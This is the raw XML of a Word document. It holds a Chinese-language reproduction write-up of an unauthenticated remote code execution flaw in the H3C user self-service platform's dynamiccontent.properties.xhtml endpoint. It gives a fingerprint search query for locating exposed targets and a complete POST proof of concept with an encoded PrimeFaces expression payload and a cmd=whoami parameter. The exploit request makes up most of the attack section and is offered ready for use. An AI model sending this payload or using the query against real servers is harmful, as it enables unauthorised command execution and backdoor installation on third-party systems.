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0AB87" w14:textId="6A046DDF" w:rsidR="008562E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">H3C 用户自助服务平台 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>dynamiccontent.properties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.xhtml RCE漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02910641" w14:textId="77777777" w:rsidR="008562E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="QT0i4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>漏洞简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9A589" w14:textId="77777777" w:rsidR="008562E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="ue9935a3a"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>H3C 用户自助</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>服务平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>dynamiccontent.properties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>.xhtml 接口出存在命令执行漏洞，未经身份验证的攻击者可以利用此漏洞执行任意指令，写入后门文件，导致整个web服务器存在被控的风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57403BE8" w14:textId="77777777" w:rsidR="008562E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="qusYu"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56471A88" w14:textId="77777777" w:rsidR="008562E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="u0b4e8164"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：使用以下搜索语法获取测试资产并确定测试目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1B8CA" w14:textId="77777777" w:rsidR="008562E3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4" w:name="VbpyH"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>fid="tPmVs5PL6e9m5Xt0J4V2+A=="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AAC7A5" w14:textId="77777777" w:rsidR="008562E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="u73bcc09f"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>步骤二：发送以下POC即可造成命令执行...结果在响应正文中获取!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB9C981" w14:textId="77777777" w:rsidR="008562E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ae"/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4" w:color="000000" w:themeColor="text1"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="DW8uI"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept-Encoding: gzip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>pfdrt=sc&amp;ln=primefaces&amp;pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&amp;cmd=whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07425A2E" w14:textId="6231EB7C" w:rsidR="008562E3" w:rsidRDefault="00000000" w:rsidP="00272680">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="u0d34f751"/>
      <w:bookmarkStart w:id="8" w:name="uf5438fc7"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="178A423F" wp14:editId="2E1C32D2">
            <wp:extent cx="5096933" cy="3657010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129494382" name="图片 12949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6933" cy="36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Tvr84"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:sectPr w:rsidR="008562E3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8562E3"/>
    <w:rsid w:val="00272680"/>
    <w:rsid w:val="008562E3"/>
    <w:rsid w:val="00BE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02C6"/>
  <w15:docId w15:val="{8A44146C-E176-4F99-97DE-B18961D6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467886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ae"/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鹏 王</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-30T08:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-30T08:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>